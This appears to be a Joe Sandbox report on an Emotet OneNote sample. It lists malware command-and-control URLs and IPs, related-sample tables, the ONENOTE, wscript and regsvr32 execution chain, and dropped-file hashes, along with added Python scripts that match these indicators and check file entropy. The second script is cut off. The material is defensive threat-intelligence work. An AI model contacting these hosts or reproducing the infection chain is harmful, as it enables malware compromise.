  Source: wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.000000000512D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345037298.000000000510B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345791230.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.343112035.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337309001.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349571912.00000000053A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.343189350.0000000004FAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347462886.00000000051C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.343401747.0000000005065000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
  Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://66.228.32.31:7080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/_
  Source: regsvr32.exe, 0000000C.00000003.451389170.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451113819.000000000133A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://159.89.202.34/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
  Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://160.16.142.56:8080/
  Source: regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
URL: https://164.90.222.65/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
  Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://163.44.196.120:8080/3
  Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
110.232.117.186 | unknown | Australia | 56038 | RACKCORP-APRackCorpAU | true
103.132.242.26 | unknown | India | 45117 | INPL-IN-APIshansNetworkIN | true
104.168.155.143 | unknown | United States | 54290 | HOSTWINDSUS | true
79.137.35.198 | unknown | France | 16276 | OVHFR | true
115.68.227.76 | unknown | Korea Republic of | 38700 | SMILESERV-AS-KRSMILESERVKR | true
163.44.196.120 | unknown | Singapore | 135161 | GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | true
206.189.28.199 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
203.26.41.131 | penshorn.org | Australia | 38719 | DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | true
107.170.39.149 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
66.228.32.31 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
197.242.150.244 | unknown | South Africa | 37611 | AfrihostZA | true
185.4.135.165 | unknown | Greece | 199246 | TOPHOSTGR | true
183.111.227.137 | unknown | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | true
45.176.232.124 | unknown | Colombia | 267869 | CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC | true
169.57.156.166 | unknown | United States | 36351 | SOFTLAYERUS | true
164.68.99.3 | unknown | Germany | 51167 | CONTABODE | true
139.59.126.41 | unknown | Singapore | 14061 | DIGITALOCEAN-ASNUS | true
167.172.253.162 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
167.172.199.165 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
202.129.205.3 | unknown | Thailand | 45328 | NIPA-AS-THNIPATECHNOLOGYCOLTDTH | true
147.139.166.154 | unknown | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
153.92.5.27 | unknown | Germany | 47583 | AS-HOSTINGERLT | true
159.65.88.10 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
172.105.226.75 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
164.90.222.65 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
213.239.212.5 | unknown | Germany | 24940 | HETZNER-ASDE | true
5.135.159.50 | unknown | France | 16276 | OVHFR | true
186.194.240.217 | unknown | Brazil | 262733 | NetceteraTelecomunicacoesLtdaBR | true
119.59.103.152 | unknown | Thailand | 56067 | METRABYTE-TH453LadplacoutJorakhaebuaTH | true
159.89.202.34 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
91.121.146.47 | unknown | France | 16276 | OVHFR | true
160.16.142.56 | unknown | Japan | 9370 | SAKURA-BSAKURAInternetIncJP | true
201.94.166.162 | unknown | Brazil | 28573 | CLAROSABR | true
91.207.28.33 | unknown | Kyrgyzstan | 39819 | PROHOSTKG | true
103.75.201.2 | unknown | Thailand | 133496 | CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH | true
103.43.75.120 | unknown | Japan | 20473 | AS-CHOOPAUS | true
188.44.20.25 | unknown | Macedonia | 57374 | GIV-ASMK | true
45.235.8.30 | unknown | Brazil | 267405 | WIKINETTELECOMUNICACOESBR | true
153.126.146.25 | unknown | Japan | 7684 | SAKURA-ASAKURAInternetIncJP | true
72.15.201.15 | unknown | United States | 13649 | ASN-VINSUS | true
187.63.160.88 | unknown | Brazil | 28169 | BITCOMPROVEDORDESERVICOSDEINTERNETLTDABR | true
82.223.21.224 | unknown | Spain | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
173.212.193.249 | unknown | Germany | 51167 | CONTABODE | true
95.217.221.146 | unknown | Germany | 24940 | HETZNER-ASDE | true
149.56.131.28 | unknown | Canada | 16276 | OVHFR | true
182.162.143.56 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true
1.234.2.232 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
129.232.188.93 | unknown | South Africa | 37153 | xneeloZA | true
94.23.45.86 | unknown | France | 16276 | OVHFR | true
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 828495
Start date and time: 2023-03-17 09:15:06 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Insight_Medical_Publishing_3.one
Detection: MAL
Classification: mal100.troj.expl.evad.winONE@9/11@1/49
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 50.2% (good quality ratio 42.4%)
              • Quality average: 60.5%
              • Quality standard deviation: 35.6%
              HCA Information:
              • Successful, ratio: 89%
              • Number of executed functions: 19
              • Number of non-executed functions: 136
              Cookbook Comments:
              • Found application associated with file extension: .one
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 93.184.221.240, 95.140.230.192
              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
• Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:16:48 | API Interceptor | 2x Sleep call for process: wscript.exe modified
09:17:21 | API Interceptor | 10x Sleep call for process: regsvr32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
110.232.117.186 | Insight_Medical_Publishing_4.one | malicious | Emotet
110.232.117.186 | OMICS_Online_1.one | malicious | Emotet
110.232.117.186 | Insight_Medical_Publishing.one | malicious | Emotet
110.232.117.186 | Omics_Journal.one | malicious | Emotet
110.232.117.186 | OMICS.one | malicious | Emotet
110.232.117.186 | OPAST_GROUP_1.one | malicious | Emotet
110.232.117.186 | OPAST_GROUP_LLC.one | malicious | Emotet
110.232.117.186 | OPAST_GROUP.one | malicious | Emotet
110.232.117.186 | Opast_International.one | malicious | Emotet
110.232.117.186 | opastonline.com.one | malicious | Emotet
110.232.117.186 | Opast_Publishing_Group_1.one | malicious | Emotet
110.232.117.186 | Opast_Publishing_Group.one | malicious | Emotet
110.232.117.186 | omicsonline.net.one | malicious | Emotet
110.232.117.186 | report_03_16_2023.one | malicious | Emotet
110.232.117.186 | 2023-03-16_0923.one | malicious | Emotet
110.232.117.186 | report_03_16_2023.one | malicious | Emotet
110.232.117.186 | 100935929722734787.one | malicious | Emotet
110.232.117.186 | NG7553084292252526_202303161746.one | malicious | Emotet
110.232.117.186 | 2023-03-16_1753.one | malicious | Emotet
110.232.117.186 | PUV026949243199756981_202303161748.one | malicious | Emotet
Match: penshorn.org (domain)
Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
Insight_Medical_Publishing_4.one | malicious | Emotet | 203.26.41.131
OMICS_Online_1.one | malicious | Emotet | 203.26.41.131
Insight_Medical_Publishing.one | malicious | Emotet | 203.26.41.131
Omics_Journal.one | malicious | Emotet | 203.26.41.131
OMICS.one | malicious | Emotet | 203.26.41.131
OPAST_GROUP_1.one | malicious | Emotet | 203.26.41.131
OPAST_GROUP_LLC.one | malicious | Emotet | 203.26.41.131
OPAST_GROUP.one | malicious | Emotet | 203.26.41.131
Opast_International.one | malicious | Emotet | 203.26.41.131
opastonline.com.one | malicious | Emotet | 203.26.41.131
Opast_Publishing_Group_1.one | malicious | Emotet | 203.26.41.131
Opast_Publishing_Group.one | malicious | Emotet | 203.26.41.131
omicsonline.net.one | malicious | Emotet | 203.26.41.131
report_03_16_2023.one | malicious | Emotet | 203.26.41.131
2023-03-16_0923.one | malicious | Emotet | 203.26.41.131
report_03_16_2023.one | malicious | Emotet | 203.26.41.131
100935929722734787.one | malicious | Emotet | 203.26.41.131
NG7553084292252526_202303161746.one | malicious | Emotet | 203.26.41.131
2023-03-16_1753.one | malicious | Emotet | 203.26.41.131
PUV026949243199756981_202303161748.one | malicious | Emotet | 203.26.41.131
Match: RACKCORP-AP (RackCorp, AU) (ASN)
Associated Sample Name / URL | Detection | Threat Name | Context (IP in this ASN)
Insight_Medical_Publishing_4.one | malicious | Emotet | 110.232.117.186
OMICS_Online_1.one | malicious | Emotet | 110.232.117.186
Insight_Medical_Publishing.one | malicious | Emotet | 110.232.117.186
Omics_Journal.one | malicious | Emotet | 110.232.117.186
OMICS.one | malicious | Emotet | 110.232.117.186
OPAST_GROUP_1.one | malicious | Emotet | 110.232.117.186
OPAST_GROUP_LLC.one | malicious | Emotet | 110.232.117.186
OPAST_GROUP.one | malicious | Emotet | 110.232.117.186
Opast_International.one | malicious | Emotet | 110.232.117.186
opastonline.com.one | malicious | Emotet | 110.232.117.186
Opast_Publishing_Group_1.one | malicious | Emotet | 110.232.117.186
Opast_Publishing_Group.one | malicious | Emotet | 110.232.117.186
omicsonline.net.one | malicious | Emotet | 110.232.117.186
report_03_16_2023.one | malicious | Emotet | 110.232.117.186
2023-03-16_0923.one | malicious | Emotet | 110.232.117.186
report_03_16_2023.one | malicious | Emotet | 110.232.117.186
100935929722734787.one | malicious | Emotet | 110.232.117.186
NG7553084292252526_202303161746.one | malicious | Emotet | 110.232.117.186
2023-03-16_1753.one | malicious | Emotet | 110.232.117.186
PUV026949243199756981_202303161748.one | malicious | Emotet | 110.232.117.186
Match: ce5f3254611a8c095a3d821d44539877 (JA3 client fingerprint)
Associated Sample Name / URL | Detection | Threat Name | Context (IP seen with this JA3)
Insight_Medical_Publishing_4.one | malicious | Emotet | 203.26.41.131
OMICS_Online_1.one | malicious | Emotet | 203.26.41.131
Insight_Medical_Publishing.one | malicious | Emotet | 203.26.41.131
Omics_Journal.one | malicious | Emotet | 203.26.41.131
OMICS.one | malicious | Emotet | 203.26.41.131
OPAST_GROUP_1.one | malicious | Emotet | 203.26.41.131
OPAST_GROUP_LLC.one | malicious | Emotet | 203.26.41.131
OPAST_GROUP.one | malicious | Emotet | 203.26.41.131
Opast_International.one | malicious | Emotet | 203.26.41.131
opastonline.com.one | malicious | Emotet | 203.26.41.131
Opast_Publishing_Group_1.one | malicious | Emotet | 203.26.41.131
Opast_Publishing_Group.one | malicious | Emotet | 203.26.41.131
omicsonline.net.one | malicious | Emotet | 203.26.41.131
aRThcK3rSO.exe | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader | 203.26.41.131
click.wsf | malicious | Emotet | 203.26.41.131
setup.exe | malicious | Amadey, Djvu, RedLine, SmokeLoader | 203.26.41.131
purchase_order.exe | malicious | BluStealer, ThunderFox Stealer, a310Logger | 203.26.41.131
file.exe | malicious | Amadey, Djvu, SmokeLoader | 203.26.41.131
setup.exe | malicious | SmokeLoader | 203.26.41.131
it2NFpv2yt.exe | malicious | SmokeLoader | 203.26.41.131
Match: C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll (dropped file)
Associated Sample Name / URL | Detection | Threat Name
Insight_Medical_Publishing_4.one | malicious | Emotet
OMICS_Online_1.one | malicious | Emotet
Insight_Medical_Publishing.one | malicious | Emotet
Omics_Journal.one | malicious | Emotet
OMICS.one | malicious | Emotet
OPAST_GROUP_1.one | malicious | Emotet
OPAST_GROUP_LLC.one | malicious | Emotet
OPAST_GROUP.one | malicious | Emotet
Opast_International.one | malicious | Emotet
opastonline.com.one | malicious | Emotet
Opast_Publishing_Group_1.one | malicious | Emotet
Opast_Publishing_Group.one | malicious | Emotet
omicsonline.net.one | malicious | Emotet
report_03_16_2023.one | malicious | Emotet
2023-03-16_0923.one | malicious | Emotet
report_03_16_2023.one | malicious | Emotet
100935929722734787.one | malicious | Emotet
NG7553084292252526_202303161746.one | malicious | Emotet
2023-03-16_1753.one | malicious | Emotet
PUV026949243199756981_202303161748.one | malicious | Emotet
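The similar-analysis tables above give a small set of pivotable indicators: the IP 110.232.117.186, the domain penshorn.org resolving to 203.26.41.131, the JA3 client fingerprint ce5f3254611a8c095a3d821d44539877, and a DLL dropped to the user's Temp folder (rad38C2A.tmp.dll) that regsvr32.exe loads. The script below is an added example, not part of the Joe Sandbox report, that applies those indicators to a handful of constructed endpoint events and also shows the one trap in this report: regsvr32.exe fetching authroot.stl from ctldl.windowsupdate.com is the Windows CTL auto-update (the report whitelists that domain), not C2, so it must not trip the rule. The key=value event format, the sample lines, the script name and the generalised rad*.tmp.dll path pattern are assumptions made for this example.

```python
"""Added example (not from the Joe Sandbox report): match the report's IOCs
against constructed endpoint events. Event format and sample lines are
invented for this example; only the indicator values come from the report."""
import re

# Indicators listed in the report's similar-analysis tables.
IOC_IPS = {"110.232.117.186", "203.26.41.131"}
IOC_DOMAINS = {"penshorn.org"}
IOC_JA3 = {"ce5f3254611a8c095a3d821d44539877"}
# Domains the report excluded as benign (regsvr32's CTL update goes here).
WHITELISTED_DOMAINS = {"ctldl.windowsupdate.com", "www.bing.com", "fs.microsoft.com"}
# regsvr32 loading rad<hex>.tmp.dll from %LOCALAPPDATA%\Temp. Generalised from
# the single path in the report (assumption: the hex part varies per run).
TEMP_DLL_RE = re.compile(r"\\AppData\\Local\\Temp\\rad[0-9A-Fa-f]+\.tmp\.dll$", re.IGNORECASE)

# Constructed events, one per line, key=value with optional double quotes.
SAMPLE_LOG = """\
type=process image=C:\\Windows\\SysWOW64\\wscript.exe parent=ONENOTE.EXE cmdline="wscript.exe C:\\Users\\user\\AppData\\Local\\Temp\\script.wsf"
type=process image=C:\\Windows\\System32\\regsvr32.exe parent=wscript.exe cmdline="regsvr32.exe C:\\Users\\user\\AppData\\Local\\Temp\\rad38C2A.tmp.dll"
type=dns image=C:\\Windows\\System32\\regsvr32.exe query=ctldl.windowsupdate.com answer=93.184.221.240
type=dns image=C:\\Windows\\System32\\regsvr32.exe query=penshorn.org answer=203.26.41.131
type=net image=C:\\Windows\\System32\\regsvr32.exe dst=110.232.117.186 ja3=ce5f3254611a8c095a3d821d44539877
type=net image="C:\\Program Files\\Internet Explorer\\iexplore.exe" dst=93.184.221.240 ja3=00000000000000000000000000000000
"""

KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_event(line: str) -> dict:
    """Split one key=value line into a dict; quoted values may contain spaces."""
    return {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
            for m in KV_RE.finditer(line)}


def check_event(ev: dict) -> list:
    """Return a list of human-readable hits for one parsed event."""
    hits = []
    kind = ev.get("type")
    if kind == "process":
        image = ev.get("image", "").lower()
        cmd = ev.get("cmdline", "")
        target = cmd.split()[-1].strip('"') if cmd else ""
        # The report's execution chain: regsvr32.exe handed a DLL in Temp.
        if image.endswith("regsvr32.exe") and TEMP_DLL_RE.search(target):
            hits.append(f"regsvr32 loading DLL from Temp: {target}")
    elif kind == "dns":
        query = ev.get("query", "").lower()
        if query in WHITELISTED_DOMAINS:
            return []  # benign CTL/update traffic, deliberately ignored
        if query in IOC_DOMAINS:
            hits.append(f"DNS query for IOC domain: {query}")
        if ev.get("answer") in IOC_IPS:
            hits.append(f"DNS answer is IOC IP: {ev['answer']}")
    elif kind == "net":
        if ev.get("dst") in IOC_IPS:
            hits.append(f"connection to IOC IP: {ev['dst']}")
        if ev.get("ja3", "").lower() in IOC_JA3:
            hits.append(f"TLS client fingerprint matches IOC JA3: {ev['ja3']}")
    return hits


def scan(log_text: str) -> list:
    """Scan a multi-line log; return (line_number, hit) pairs."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        for hit in check_event(parse_event(line)):
            findings.append((n, hit))
    return findings


if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG):
        print(f"line {n}: {hit}")
```

Against the constructed log this flags line 2 (regsvr32 with a Temp DLL), line 4 twice (domain and resolved IP) and line 5 twice (IP and JA3), and stays silent on the ctldl.windowsupdate.com lookup and on the unrelated browser connection. Treat the JA3 match as corroboration only; the fingerprint is shared with the non-Emotet samples listed in the same table.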
                                                                                              Process:C:\Windows\System32\regsvr32.exe
                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):62582
                                                                                              Entropy (8bit):7.996063107774368
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
                                                                                              MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
                                                                                              SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
                                                                                              SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                                                                                              SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                                                                                              Malicious:false
                                                                                              Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.
                                                                                              Process:C:\Windows\System32\regsvr32.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):290
                                                                                              Entropy (8bit):2.9542848029467006
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:kKNg1ry/CN+SkQlPlEGYRMY9z+4KlDA3RUe/:WJCpkPlE99SNxAhUe/
                                                                                              MD5:D9F329065228D1052F80DFD86FBAF630
                                                                                              SHA1:BEB453F722F5DA26BAB114412369BC790455C431
                                                                                              SHA-256:4B5C31C51235D3A2F1AFA5BCE16D41AA2DA95014B493C526637BE6E1865EF2EB
                                                                                              SHA-512:BF037A5AFFF2DB2BDA7BC204BEBAE79192DC1DF823C7496BD669ECE3395ACD01BF5C9461666A32C9F2E679665EE7068EA9049E51181FCF454A7033F34803DF55
                                                                                              Malicious:false
                                                                                              Preview:p...... .........1...X..(....................................................... ..........).K..................v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:Matlab v4 mat-file (little endian) \340\004, numeric, rows 262223750, columns 0 (libmagic guess only; this is a 72-byte file written by ONENOTE.EXE, not a MATLAB data file)
                                                                                              Category:dropped
                                                                                              Size (bytes):72
                                                                                              Entropy (8bit):2.106463217645438
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ulXH+lS8TcRaAqlAaRtl:KelS8Tc8TX
                                                                                              MD5:6D35FE979A2AF81158578D8FF8AA4390
                                                                                              SHA1:4FACFE5FFF9553E926FC82615BBFF18F47876715
                                                                                              SHA-256:41E5436CD2453FF8DC3D187CCC680CE58212D72C77CCA0E632B51085BDE7ECED
                                                                                              SHA-512:947226E35A9BEC0F93AE0467AC23DBE81EFC681A48F3FE6F49F70A2B0BDD35AB533165240D442C2492EA57D29CFA403B848FF8E9BB6EFEADAB507C12DEAE4CEE
                                                                                              Malicious:false
                                                                                              Preview:.....7..........$...................................T...................
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):0.7053394102816869
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:geymLsJE+mZc8/hzSlZWV6dNg6qnuaLvOlSosUZKg9eiDx8lW:NiuPZGlZWV6da6+uazODZKDiDv
                                                                                              MD5:DD5E5ED496A7861D9B6F291070CC5F5B
                                                                                              SHA1:697CDBB2F039943BE9EB82B52D5711709BC998E1
                                                                                              SHA-256:B1D13B637698D27B702BD7797D61AD1B2A297FDF8758B5E653DF2AE3961612D8
                                                                                              SHA-512:486214A36237BAB2DC7925CDCBA1F799A3F790C0BB18FBABEEECA7C47568376E3E520DD185F7D53878C2B955B7D2CC122DAA4EA377B221BF6E5D2AD313670EF1
                                                                                              Malicious:false
                                                                                              Preview:.@..`....................................................................................t...............@.......B...........X..Zb..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................[...... .....p....X..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P.............................................................................7.B..t......17134.1.x86fre.rs4_release.180410-1804......$.@..t......U......@..%|n.z.....P:\Target\x86\ship\onenote\x-none\onmain.pdb.ain.pdb.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.............................................
                                                                                              Process:C:\Windows\SysWOW64\wscript.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):9
                                                                                              Entropy (8bit):2.94770277922009
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:tWn:tWn
                                                                                              MD5:07F5A0CFFD9B2616EA44FB90CCC04480
                                                                                              SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
                                                                                              SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
                                                                                              SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
                                                                                              Malicious:true
                                                                                              Preview:badum tss
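Each dropped-file entry above reports a size, an 8-bit entropy, an "Encrypted" flag and MD5/SHA-1/SHA-256 digests. The 9-byte file whose preview reads "badum tss" is small enough to recompute by hand, so it makes a good check that one's own tooling agrees with the sandbox. The script below is an added example, not part of the Joe Sandbox report: it computes Shannon entropy and the three digests for that file's bytes (taken from the size and preview above) and compares them with the reported values. The "Encrypted" threshold is an assumption; the report does not state its cut-off, and the 62582-byte authroot.stl cabinet above (MSZIP-compressed, entropy 7.996, flagged Encrypted) shows that compressed data scores just as high as encrypted data, so the flag means "high entropy", nothing more.

```python
"""Added example (not from the Joe Sandbox report): recompute the per-file
statistics the dropped-file entries report and compare them with the
reported values. Sample bytes: the 9-byte "badum tss" file listed above."""
import hashlib
import math
from collections import Counter

# Assumption: the report's own "Encrypted" cut-off is not documented here.
ENCRYPTED_THRESHOLD = 7.9


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for empty input, 8.0 max."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    """MD5, SHA-1 and SHA-256 as upper-case hex, the way the report prints them."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
    }


def triage_dropped_file(data: bytes, reported: dict) -> dict:
    """Compare computed size, entropy and digests against a report entry."""
    entropy = shannon_entropy(data)
    hashes = file_hashes(data)
    return {
        "size": len(data),
        "size_matches": len(data) == reported["size"],
        "entropy": entropy,
        "entropy_matches": abs(entropy - reported["entropy"]) < 1e-9,
        "hash_matches": {k: hashes[k] == reported[k].upper()
                         for k in hashes if k in reported},
        "looks_encrypted": entropy > ENCRYPTED_THRESHOLD,
    }


# Content reconstructed from the report entry: 9 bytes, ASCII, preview "badum tss".
BADUM_TSS = b"badum tss"
REPORTED_BADUM_TSS = {
    "size": 9,
    "entropy": 2.94770277922009,
    "MD5": "07F5A0CFFD9B2616EA44FB90CCC04480",
    "SHA1": "641B12C5FFA1A31BC367390E34D441A9CE1958EE",
    "SHA-256": "A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896",
}

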